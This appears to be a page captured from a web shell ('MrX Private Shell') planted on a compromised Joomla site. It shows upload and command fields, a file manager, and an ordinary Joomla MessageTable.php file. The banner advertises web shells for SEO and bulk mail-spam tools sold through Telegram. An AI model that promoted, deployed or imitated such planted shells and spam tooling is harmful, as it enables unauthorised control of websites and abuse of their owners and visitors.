__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * @package     Joomla.Administrator
 * @subpackage  com_messages
 *
 * @copyright   (C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\Component\Messages\Administrator\Table;

use Joomla\CMS\Language\Text;
use Joomla\CMS\Table\Table;
use Joomla\CMS\User\User;
use Joomla\Database\DatabaseDriver;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Message Table class
 *
 * @since  1.5
 */
class MessageTable extends Table
{
    /**
     * Constructor
     *
     * @param   DatabaseDriver  $db  Database connector object
     *
     * @since   1.5
     */
    public function __construct(DatabaseDriver $db)
    {
        parent::__construct('#__messages', 'message_id', $db);

        $this->setColumnAlias('published', 'state');
    }

    /**
     * Validation and filtering.
     *
     * @return  boolean
     *
     * @since   1.5
     */
    public function check()
    {
        try {
            parent::check();
        } catch (\Exception $e) {
            $this->setError($e->getMessage());

            return false;
        }

        // Check the to and from users.
        $user = new User($this->user_id_from);

        if (empty($user->id)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_FROM_USER'));

            return false;
        }

        $user = new User($this->user_id_to);

        if (empty($user->id)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_TO_USER'));

            return false;
        }

        if (empty($this->subject)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_SUBJECT'));

            return false;
        }

        if (empty($this->message)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_MESSAGE'));

            return false;
        }

        return true;
    }
}

Filemanager

Name Type Size Permission Actions
MessageTable.php File 1.94 KB 0664
Filemanager